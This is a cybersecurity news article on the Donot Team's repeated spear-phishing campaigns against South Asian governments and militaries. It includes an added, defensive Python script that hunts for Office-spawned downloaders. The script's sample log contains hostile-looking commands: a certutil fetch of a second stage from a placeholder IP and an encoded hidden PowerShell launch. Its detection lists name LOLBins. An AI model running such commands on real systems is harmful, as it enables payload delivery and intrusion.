DoNot Team Has Been Targeting Government and Military Entities in South Asia For Years

A threat actor with ties to an Indian cybersecurity firm has been attacking government and military organizations in South Asia for years. Since at least September 2020, the actor has deployed successive variants of its malware framework against targets in Bangladesh, Nepal, and Sri Lanka.

According to the Slovak security firm ESET, the attackers, referred to as the Donot Team, have been sending spear-phishing emails to the targeted organizations.

“Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months,” researchers Facundo Muñoz and Matías Porolli said.

Also known as APT-C-35 and SectorE02, the Donot Team is suspected of primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware since 2016.

In 2021, Amnesty International published evidence linking the Donot Team's operations to an Indian cybersecurity company known as Innefu Labs, which may be selling the spyware or offering hackers-for-hire services to governments in the region.

Rather than relying on a single persistent backdoor to keep its foothold in a previously compromised network, the Donot Team returns to the same targets with new spear-phishing waves, each delivering a different variant of the same malware.

The group's primary toolset is the yty malware framework: a chain of intermediary downloaders, delivered through weaponized Microsoft Office documents, that ultimately executes a backdoor.
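The delivery pattern described above, a document opened in Word or Excel that launches a script host or a living-off-the-land binary to fetch the next stage, is the point where this chain is easiest to spot on an endpoint. The following hunting script is an added example, not code from ESET or from the Donot Team's tooling. The log lines are constructed in a simplified Sysmon-style process-creation format, and the parent/child process lists and command-line hints are generic assumptions for the Office-to-downloader pattern, not indicators tied to yty.

```python
"""Hunt for an Office process spawning a script host or LOLBin that fetches
a next stage. Log lines below are constructed (simplified Sysmon Event ID 1
shape); the process lists and hints are assumptions for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parent processes that should almost never launch command interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Children commonly used to host an intermediary downloader stage (assumed list).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Command-line fragments that suggest fetching or decoding a payload (assumed).
DOWNLOAD_HINTS = re.compile(
    r"(https?://|downloadstring|invoke-webrequest|-urlcache|bitsadmin|-enc\b|frombase64)",
    re.IGNORECASE,
)

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent="(?P<parent>[^"]*)" '
    r'image="(?P<image>[^"]*)" cmd="(?P<cmd>[^"]*)"$'
)


@dataclass
class Event:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one constructed log line; return None for blank or malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Event(m["ts"], m["host"], m["parent"], m["image"], m["cmd"])


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> Optional[str]:
    """Return 'high', 'medium' or None for a single process-creation event."""
    if basename(ev.parent) not in OFFICE_PARENTS:
        return None
    if basename(ev.image) not in SUSPICIOUS_CHILDREN:
        return None  # e.g. Office spawning splwow64.exe for printing is benign
    # An Office child that also looks like it is fetching/decoding a stage is high.
    return "high" if DOWNLOAD_HINTS.search(ev.cmdline) else "medium"


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, child process, severity) for every suspicious event."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        sev = classify(ev)
        if sev:
            hits.append((ev.host, basename(ev.image), sev))
    return hits


# Constructed sample telemetry; hosts, paths and URLs are made up.
SAMPLE_LOG = r"""
2021-02-03T09:12:44Z host=WS01 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/stage2.dat %TEMP%\s2.dat"
2021-02-03T09:12:45Z host=WS01 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\splwow64.exe" cmd="splwow64.exe 12288"
2021-02-03T09:15:02Z host=WS02 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c dir"
2021-02-03T10:01:17Z host=WS03 parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"
2021-02-03T10:30:09Z host=WS04 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\mshta.exe" cmd="mshta.exe vbscript:close"
"""

if __name__ == "__main__":
    for host, child, sev in hunt(SAMPLE_LOG.splitlines()):
        print(f"{sev:6} {host} {child}")
```

The "medium" tier keeps Office-spawned script hosts visible even when the first stage carries no obvious download string, since the page notes that the group's downloaders are intermediaries whose follow-on stages may only appear later; the explorer.exe and splwow64.exe lines show the two kinds of benign noise the parent and child filters are there to exclude.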

Data collected by ESET shows that since September 2020 the attackers have used three variants of yty: DarkMusical, Gedit, and Jaca.

A further variant, a modified version of Gedit dubbed Henos, was used in attacks against military organizations in Sri Lanka and Bangladesh between February and March 2021.

“Donot Team makes up for its low sophistication with tenacity,” the researchers concluded. “We expect that it will continue to push on regardless of its many setbacks. Only time will tell if the group evolves its current TTPs and malware.”

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.